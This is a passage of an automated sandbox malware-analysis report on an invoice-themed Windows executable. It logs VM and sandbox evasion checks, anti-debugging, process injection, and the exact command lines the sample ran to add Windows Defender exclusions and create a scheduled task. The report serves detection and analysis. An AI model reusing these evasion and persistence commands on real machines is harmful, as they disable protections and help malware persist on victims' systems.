                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AntiVM3
                        Source: Yara matchFile source: Process Memory Space: TT Invoice copy.exe PID: 6716, type: MEMORYSTR
                        Check if machine is in data center or colocation facility
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: TT Invoice copy.exe, 00000000.00000002.1682284235.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 00000009.00000002.1721632586.00000000036D1000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2884744372.0000000000431000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeMemory allocated: A50000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeMemory allocated: 27D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeMemory allocated: DC0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeMemory allocated: 87D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeMemory allocated: 97D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeMemory allocated: 99D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeMemory allocated: A9D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeMemory allocated: 1010000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeMemory allocated: 2C80000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeMemory allocated: 1030000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeMemory allocated: 2310000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeMemory allocated: 2490000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeMemory allocated: 4490000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeMemory allocated: 80E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeMemory allocated: 6960000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeMemory allocated: 80E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeMemory allocated: 16C0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeMemory allocated: 32D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeMemory allocated: 3190000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4626Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7971Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 836Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeWindow / User API: threadDelayed 2383Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeWindow / User API: threadDelayed 2566Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeWindow / User API: threadDelayed 3944
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeWindow / User API: threadDelayed 543
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 6896Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384Thread sleep count: 4626 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384Thread sleep count: 158 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7548Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7672Thread sleep count: 2383 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -99874s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -99765s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -99656s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7672Thread sleep count: 2566 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -99532s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -99422s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -99297s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -99188s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -99063s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -98953s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -98843s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -98734s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -98623s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -98481s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -98328s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -98215s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -98109s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -98000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -97891s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -97766s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -97641s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -97529s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -97422s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -97313s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -97188s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe TID: 7668Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7656Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992Thread sleep time: -9223372036854770s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992Thread sleep time: -100000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992Thread sleep time: -99875s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7996Thread sleep count: 3944 > 30
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7996Thread sleep count: 543 > 30
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992Thread sleep time: -99765s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992Thread sleep time: -99656s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992Thread sleep time: -99546s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992Thread sleep time: -99437s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992Thread sleep time: -99327s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992Thread sleep time: -99218s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992Thread sleep time: -99109s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992Thread sleep time: -99000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992Thread sleep time: -98890s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992Thread sleep time: -98781s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992Thread sleep time: -98670s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992Thread sleep time: -98562s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992Thread sleep time: -98453s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992Thread sleep time: -98343s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992Thread sleep time: -98234s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992Thread sleep time: -98125s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992Thread sleep time: -98015s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992Thread sleep time: -97906s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992Thread sleep time: -97797s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992Thread sleep time: -97687s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe TID: 7992Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 99874Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 99765Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 99656Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 99532Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 99422Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 99297Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 99188Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 99063Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 98953Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 98843Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 98734Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 98623Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 98481Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 98328Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 98215Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 98109Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 98000Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 97891Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 97766Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 97641Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 97529Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 97422Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 97313Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 97188Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 100000
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 99875
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 99765
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 99656
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 99546
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 99437
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 99327
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 99218
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 99109
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 99000
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 98890
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 98781
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 98670
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 98562
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 98453
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 98343
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 98234
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 98125
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 98015
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 97906
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 97797
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 97687
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeThread delayed: delay time: 922337203685477
                        Source: pUAQmWA.exe, 00000009.00000002.1712648860.0000000000652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}h
                        Source: pUAQmWA.exe, 0000000D.00000002.2884744372.0000000000431000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                        Source: TT Invoice copy.exe, 00000008.00000002.2886767446.0000000000ECE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
                        Source: pUAQmWA.exe, 0000000D.00000002.2885567995.0000000001432000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'.
                        Source: TT Invoice copy.exe, 00000000.00000002.1679317215.0000000000B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD0
                        Source: pUAQmWA.exe, 0000000D.00000002.2884744372.0000000000431000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeCode function: 8_2_010170B0 CheckRemoteDebuggerPresent,8_2_010170B0
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess queried: DebugPort
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe"
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pUAQmWA.exe"
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pUAQmWA.exe"Jump to behavior
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeMemory written: C:\Users\user\Desktop\TT Invoice copy.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeMemory written: C:\Users\user\AppData\Roaming\pUAQmWA.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pUAQmWA.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3165.tmp"Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess created: C:\Users\user\Desktop\TT Invoice copy.exe "C:\Users\user\Desktop\TT Invoice copy.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3E66.tmp"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess created: C:\Users\user\AppData\Roaming\pUAQmWA.exe "C:\Users\user\AppData\Roaming\pUAQmWA.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Users\user\Desktop\TT Invoice copy.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
